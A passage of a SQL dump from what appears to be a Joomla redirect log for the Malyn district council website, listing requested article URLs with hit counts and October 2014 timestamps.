00:00:00',301),(8359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-14 19:26:33','0000-00-00 00:00:00',301),(8360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-10-14 19:26:37','0000-00-00 00:00:00',301),(8361,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-14 19:32:31','0000-00-00 00:00:00',301),(8362,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-14 19:40:10','0000-00-00 00:00:00',301),(8363,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1199:-l-r-&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-14 19:42:15','0000-00-00 00:00:00',301),(8364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&lang=uk','','','',2,0,'2014-10-14 19:49:35','0000-00-00 00:00:00',301),(8365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&Itemid=14&lang=uk','','','',2,0,'2014-10-14 19:49:36','0000-00-00 00:00:00',301),(8366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&Itemid=94&lang=ru','','','',2,0,'2014-10-14 19:49:45','0000-00-00 00:00:00',301),(8367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&lang=en','','','',2,0,'2014-10-14 19:49:45','0000-00-00 00:00:00',301),(8368,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1052:2013-07-19-11-32-33&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 19:54:17','0000-00-00 00:00:00',301),(8369,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=933:-2013-2017-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 20:09:03','0000-00-00 00:00:00',301),(8370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&lang=en','','','',1,0,'2014-10-14 20:49:24','0000-00-00 00:00:00',301),(8371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&Itemid=14&lang=uk','','','',1,0,'2014-10-14 20:49:30','0000-00-00 00:00:00',301),(8372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&lang=en','','','',1,0,'2014-10-14 20:49:41','0000-00-00 00:00:00',301),(8373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&Itemid=93&lang=uk','','','',1,0,'2014-10-14 20:49:49','0000-00-00 00:00:00',301),(8374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&Itemid=70&lang=en','','','',1,0,'2014-10-14 20:50:15','0000-00-00 00:00:00',301),(8375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:50:16','0000-00-00 00:00:00',301),(8376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&lang=en','','','',1,0,'2014-10-14 20:50:31','0000-00-00 00:00:00',301),(8377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&Itemid=14&lang=ru','','','',1,0,'2014-10-14 20:50:33','0000-00-00 00:00:00',301),(8378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&Itemid=92&lang=uk','','','',1,0,'2014-10-14 20:50:35','0000-00-00 00:00:00',301),(8379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:50:37','0000-00-00 00:00:00',301),(8380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&Itemid=93&lang=ru','','','',1,0,'2014-10-14 20:50:38','0000-00-00 00:00:00',301),(8381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:50:40','0000-00-00 00:00:00',301),(8382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&lang=ru','','','',1,0,'2014-10-14 20:50:45','0000-00-00 00:00:00',301),(8383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&Itemid=92&lang=uk','','','',1,0,'2014-10-14 20:50:48','0000-00-00 00:00:00',301),(8384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:50:53','0000-00-00 00:00:00',301),(8385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:50:55','0000-00-00 00:00:00',301),(8386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&Itemid=14&lang=ru','','','',1,0,'2014-10-14 20:50:57','0000-00-00 00:00:00',301),(8387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&Itemid=14&lang=uk','','','',1,0,'2014-10-14 20:51:02','0000-00-00 00:00:00',301),(8388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&lang=en','','','',1,0,'2014-10-14 20:51:15','0000-00-00 00:00:00',301),(8389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&Itemid=14&lang=uk','','','',1,0,'2014-10-14 20:51:27','0000-00-00 00:00:00',301),(8390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:51:29','0000-00-00 00:00:00',301),(8391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&Itemid=92&lang=en','','','',1,0,'2014-10-14 20:51:32','0000-00-00 00:00:00',301),(8392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&Itemid=94&lang=en','','','',1,0,'2014-10-14 20:51:32','0000-00-00 00:00:00',301),(8393,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-10-14 20:51:34','0000-00-00 00:00:00',301),(8394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&Itemid=70&lang=ru','','','',1,0,'2014-10-14 20:51:34','0000-00-00 00:00:00',301),(8395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:51:37','0000-00-00 00:00:00',301),(8396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-14 20:51:38','0000-00-00 00:00:00',301),(8397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&Itemid=94&lang=uk','','','',1,0,'2014-10-14 20:51:42','0000-00-00 00:00:00',301),(8398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&Itemid=14&lang=ru','','','',1,0,'2014-10-14 20:51:44','0000-00-00 00:00:00',301),(8399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&Itemid=70&lang=uk','','','',1,0,'2014-10-14 20:51:51','0000-00-00 00:00:00',301),(8400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&Itemid=94&lang=en','','','',1,0,'2014-10-14 20:51:53','0000-00-00 00:00:00',301),(8401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&Itemid=14&lang=en','','','',2,0,'2014-10-14 20:51:58','0000-00-00 00:00:00',301),(8402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&Itemid=14&lang=en','','','',1,0,'2014-10-14 20:52:30','0000-00-00 00:00:00',301),(8403,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&Itemid=92&lang=en','','','',1,0,'2014-10-14 20:52:30','0000-00-00 00:00:00',301),(8404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',12,0,'2014-10-14 20:52:33','0000-00-00 00:00:00',301),(8405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&Itemid=92&lang=ru','','','',2,0,'2014-10-14 20:52:39','0000-00-00 00:00:00',301),(8406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&Itemid=14&lang=uk','','','',1,0,'2014-10-14 20:52:43','0000-00-00 00:00:00',301),(8407,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&Itemid=94&lang=uk','','','',1,0,'2014-10-14 20:52:50','0000-00-00 00:00:00',301),(8408,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&Itemid=94&lang=uk','','','',1,0,'2014-10-14 20:52:58','0000-00-00 00:00:00',301),(8409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&Itemid=94&lang=uk','','','',1,0,'2014-10-14 20:53:12','0000-00-00 00:00:00',301),(8410,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&Itemid=14&lang=uk','','','',1,0,'2014-10-14 20:53:45','0000-00-00 00:00:00',301),(8411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-10-14 20:53:47','0000-00-00 00:00:00',301),(8412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&lang=ru','','','',1,0,'2014-10-14 20:53:48','0000-00-00 00:00:00',301),(8413,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1174:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-14 20:55:49','0000-00-00 00:00:00',301),(8414,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1144:-lr&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 21:15:42','0000-00-00 00:00:00',301),(8415,'http://www.malyn-rayrada.org.ua/index.php?Itemid=90&catid=50&id=994:2013-04-23-08-30-51&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-14 21:43:35','0000-00-00 00:00:00',301),(8416,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1155:2013-12-07-15-56-12&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-14 22:27:30','0000-00-00 00:00:00',301),(8417,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1201:2014-01-31-07-43-11&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-14 22:27:33','0000-00-00 00:00:00',301),(8418,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1314:2014-05-14-11-53-26&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-14 22:27:38','0000-00-00 00:00:00',301),(8419,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=en','','','',9,0,'2014-10-14 22:41:50','0000-00-00 00:00:00',301),(8420,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1361:-32-6-&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-14 22:47:33','0000-00-00 00:00:00',301),(8421,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1032:-l-r-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-14 23:18:08','0000-00-00 00:00:00',301),(8422,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10&Itemid=17&lang=en','','','',5,0,'2014-10-14 23:34:58','0000-00-00 00:00:00',301),(8423,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1332:2014-06-04-09-44-02&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2014-10-14 23:46:24','0000-00-00 00:00:00',301),(8424,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1270:2014-04-08-13-49-40&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-14 23:48:00','0000-00-00 00:00:00',301),(8425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-10-14 23:50:10','0000-00-00 00:00:00',301),(8426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-14 23:56:42','0000-00-00 00:00:00',301),(8427,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1235:2014-03-06-13-25-26&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-14 23:57:34','0000-00-00 00:00:00',301),(8428,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1047:2013-07-10-05-51-36&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-15 00:01:19','0000-00-00 00:00:00',301),(8429,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1058:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 00:01:21','0000-00-00 00:00:00',301),(8430,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1254:-1-50&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-15 00:01:25','0000-00-00 00:00:00',301),(8431,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1092:2013-09-19-12-18-37&Itemid=94&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 00:10:23','0000-00-00 00:00:00',301),(8432,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1283:2014-04-15-16-30-00&Itemid=14&lang=en&option=com_content&view=article','','','',69,0,'2014-10-15 00:11:06','0000-00-00 00:00:00',301),(8433,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1023:-l-28r-&Itemid=92&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-15 00:19:39','0000-00-00 00:00:00',301),(8434,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1069:23--------&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-15 00:21:04','0000-00-00 00:00:00',301),(8435,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1172:2014-01-14-14-46-07&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 00:21:11','0000-00-00 00:00:00',301),(8436,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1101:2013-10-03-07-11-01&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 00:35:33','0000-00-00 00:00:00',301),(8437,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1306:2014-04-30-09-40-02&Itemid=105&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 00:38:56','0000-00-00 00:00:00',301),(8438,'http://www.malyn-rayrada.org.ua/index.php?id=7&Itemid=12&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-15 00:42:26','0000-00-00 00:00:00',301),(8439,'http://www.malyn-rayrada.org.ua/index.php?id=7:2010-06-05-12-53-35&Itemid=12&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-15 00:46:11','0000-00-00 00:00:00',301),(8440,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1283:2014-04-15-16-30-00&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 00:50:24','0000-00-00 00:00:00',301),(8441,'http://www.malyn-rayrada.org.ua/index.php?catid=59:--20062014-&id=1324:2014-05-27-13-24-07&Itemid=107&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-15 00:51:25','0000-00-00 00:00:00',301),(8442,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1304:2014-04-30-09-11-23&Itemid=105&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 00:54:30','0000-00-00 00:00:00',301),(8443,'http://www.malyn-rayrada.org.ua/index.php?id=6&Itemid=9&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-15 00:57:05','0000-00-00 00:00:00',301),(8444,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1233:2014-03-03-10-28-35&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 01:32:19','0000-00-00 00:00:00',301),(8445,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1054:2013-07-19-11-38-20&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 01:35:27','0000-00-00 00:00:00',301),(8446,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1005:-7-1943-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 01:35:29','0000-00-00 00:00:00',301),(8447,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1132:2013-11-13-10-02-24&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-15 01:44:20','0000-00-00 00:00:00',301),(8448,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1143:2013-11-26-13-23-37&Itemid=95&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 01:44:34','0000-00-00 00:00:00',301),(8449,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1150:2013-11-28-14-53-17&Itemid=95&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 01:46:09','0000-00-00 00:00:00',301),(8450,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1090:-l-r-&Itemid=94&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-15 01:47:22','0000-00-00 00:00:00',301),(8451,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1142:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 01:54:59','0000-00-00 00:00:00',301),(8452,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1190:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 01:55:02','0000-00-00 00:00:00',301),(8453,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1316:2014-05-20-12-49-29&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 02:00:54','0000-00-00 00:00:00',301),(8454,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=929:2013-02-21-09-11-26&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 02:09:15','0000-00-00 00:00:00',301),(8455,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1299:--------lr---&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 02:13:01','0000-00-00 00:00:00',301),(8456,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1163:2013-12-20-07-44-35&Itemid=18&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-15 02:30:39','0000-00-00 00:00:00',301),(8457,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1316:2014-05-20-12-49-29&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 03:13:39','0000-00-00 00:00:00',301),(8458,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-15 03:14:30','0000-00-00 00:00:00',301),(8459,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1012:l-r&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-15 03:15:18','0000-00-00 00:00:00',301),(8460,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=14&lang=en&option=com_content&view=article','','','',5,0,'2014-10-15 03:26:57','0000-00-00 00:00:00',301),(8461,'http://malyn-rayrada.org.ua/media/editors/functions.php','','','',1,0,'2014-10-15 03:49:51','0000-00-00 00:00:00',301),(8462,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1099:-l-r&Itemid=94&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-15 03:54:45','0000-00-00 00:00:00',301),(8463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&Itemid=14&lang=en','','','',3,0,'2014-10-15 03:59:32','0000-00-00 00:00:00',301),(8464,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1000:1&Itemid=14&lang=en&option=com_content&view=article','','','',4,0,'2014-10-15 04:04:31','0000-00-00 00:00:00',301),(8465,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-15 04:15:49','0000-00-00 00:00:00',301),(8466,'http://www.malyn-rayrada.org.ua/index.php?id=7:2010-06-05-12-53-35&Itemid=12&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-15 04:50:59','0000-00-00 00:00:00',301),(8467,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1243:2014-03-17-07-32-47&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 05:02:37','0000-00-00 00:00:00',301),(8468,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1150:2013-11-28-14-53-17&Itemid=95&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-15 05:09:48','0000-00-00 00:00:00',301),(8469,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=978:-6612-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 05:17:00','0000-00-00 00:00:00',301),(8470,'http://www.malyn-rayrada.org.ua/index.php?Itemid=47&catid=21&id=27:2010-06-07-11-05-24&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 05:17:06','0000-00-00 00:00:00',301),(8471,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=895:-2013-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 05:35:25','0000-00-00 00:00:00',301),(8472,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1289:2014-04-23-06-53-01&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 05:39:30','0000-00-00 00:00:00',301),(8473,'http://www.malyn-rayrada.org.ua/index.php?catid=59:--20062014-&id=1348:2014-06-20-13-13-51&Itemid=107&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 05:40:53','0000-00-00 00:00:00',301),(8474,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1071:2013-08-27-14-06-18&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 06:36:25','0000-00-00 00:00:00',301),(8475,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&lang=ru&option=com_content&view=article','','','',6,0,'2014-10-15 06:50:51','0000-00-00 00:00:00',301),(8476,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1246:-2013-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-15 07:10:40','0000-00-00 00:00:00',301),(8477,'http://www.malyn-rayrada.org.ua/index.php?catid=59:--20062014-&id=1319:-2014-&Itemid=107&lang=en&option=com_content&view=article','','','',2,0,'2014-10-15 07:18:13','0000-00-00 00:00:00',301),(8478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33:-20052011&Itemid=66&lang=ru','','','',8,0,'2014-10-15 07:42:49','0000-00-00 00:00:00',301),(8479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1090:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 07:49:53','0000-00-00 00:00:00',301),(8480,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1278:2014-04-11-13-44-30&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-15 07:49:56','0000-00-00 00:00:00',301),(8481,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1233:2014-03-03-10-28-35&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 08:05:58','0000-00-00 00:00:00',301),(8482,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1063:2013-08-02-17-32-04&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-15 08:24:29','0000-00-00 00:00:00',301),(8483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-10-15 08:44:19','0000-00-00 00:00:00',301),(8484,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1297:2014-04-24-09-20-07&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 08:45:37','0000-00-00 00:00:00',301),(8485,'http://www.malyn-rayrada.org.ua/index.php?catid=48:--11032013-&id=961:2013-03-11-10-51-56&Itemid=87&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 09:25:00','0000-00-00 00:00:00',301),(8486,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1065:2013-08-14-12-52-50&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 10:20:03','0000-00-00 00:00:00',301),(8487,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1310:2014-05-06-14-07-43&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 11:10:52','0000-00-00 00:00:00',301),(8488,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1256:2014-03-27-17-22-43&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 11:18:22','0000-00-00 00:00:00',301),(8489,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1141:2013-11-26-13-18-12&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-15 11:55:20','0000-00-00 00:00:00',301),(8490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33:-20052011&Itemid=66&lang=ru','','','',2,0,'2014-10-15 12:24:24','0000-00-00 00:00:00',301),(8491,'http://malyn-rayrada.org.ua/update.php','','','',1,0,'2014-10-15 12:43:52','0000-00-00 00:00:00',301),(8492,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1230:l-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 13:29:27','0000-00-00 00:00:00',301),(8493,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=911:2013-01-22-13-27-41&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 13:29:29','0000-00-00 00:00:00',301),(8494,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=965:2013-03-14-10-56-03&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 14:05:44','0000-00-00 00:00:00',301),(8495,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1090:-l-r-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-15 14:05:47','0000-00-00 00:00:00',301),(8496,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1171:2014-01-11-09-58-40&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 14:25:43','0000-00-00 00:00:00',301),(8497,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1297:2014-04-24-09-20-07&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 15:59:11','0000-00-00 